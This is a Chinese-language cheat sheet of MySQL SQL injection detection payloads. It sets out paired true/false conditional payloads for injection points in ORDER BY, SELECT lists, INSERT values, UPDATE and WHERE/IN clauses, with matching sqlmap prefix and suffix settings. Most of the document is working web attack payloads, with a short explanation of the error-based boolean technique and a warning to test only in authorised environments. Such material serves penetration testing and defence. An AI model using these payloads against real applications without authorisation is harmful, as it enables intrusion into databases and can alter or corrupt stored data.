整理的mysql各种位置sql注入基本检测语句

原理说明: 每组 payload 成对使用, 1=1 为真条件, 1=2 为假条件。(select 1 union select 2) 作为标量子查询会返回两行, 只要该分支被求值, MySQL 就会报错 "Subquery returns more than 1 row" (错误码 1242); 因此真条件下语句正常执行, 假条件下报错 (或页面 500/异常), 对比两次响应即可判断注入点是否存在。即使应用隐藏了数据库错误, 通常仍能通过响应差异识别。
注意: '+(...)+' 写法依赖 MySQL 中 + 是数值加法 (空字符串 '' 转成 0), 表达式结果是数字 1 而不是原字符串。在 insert/update 的值位置测试时, 真条件会把 1 写入目标字段; 在 where 位置则会按数值比较, 可能匹配到意料之外的行并执行更新。请只在测试数据/授权环境中验证。

order by xx {sql}  :
  1. ,if((1=1),1,(select 1 union select 2))
  2. ,if((1=2),1,(select 1 union select 2))
sqlmap (对应 --prefix / --suffix 参数, sqlmap 自己的布尔条件会被拼在前缀与后缀之间):
  1. 设置前缀 --prefix=",if((1=1"
  2. 设置后缀 --suffix="),1,(select 1 union select 2))"
  拼接示例 (sqlmap 注入 " AND 1234=1234" 时): ,if((1=1 AND 1234=1234),1,(select 1 union select 2))
=======================================================

select xxx [as x]{sql} from xx   (注入点位于 select 列表中, as x 为可选别名)   :
  1. ,case when(1=1)then 1 else (select 1 union select 2) end
  2. ,case when(1=2)then 1 else (select 1 union select 2) end
=======================================================

select * from xxx order by {sql}   :
  1. (case when(1=1) then 1 else (select 1 union select 2) end)
  2. (case when(1=2) then 1 else (select 1 union select 2) end)
or
  1. 已存在字段,if((1=1),1,(select 1 union select 2))
  2. 已存在字段,if((1=2),1,(select 1 union select 2))       
=======================================================

insert into person (number,name) values (1,'{sql}')   :
  1. '+(if((1=1),1,(select 1 union select 2)))+'
  2. '+(if((1=2),1,(select 1 union select 2)))+'
or
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+'
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

update xxx set x='{sql}'    :
  1. '+(if((1=1),1,(select 1 union select 2)))+'
  2. '+(if((1=2),1,(select 1 union select 2)))+'
or
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+'
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

update xxx set x=x where xx ='{sql}'   :
  1. '+(case when(1=1) then 1 else (select 1 union select 2) end)+'
  2. '+(case when(1=2) then 1 else (select 1 union select 2) end)+'
=======================================================

select * from xxx where x in ('xx','{sql}')   :
  1. '+if((1=1),1,(select 1 union select 2))+'
  2. '+if((1=2),1,(select 1 union select 2))+'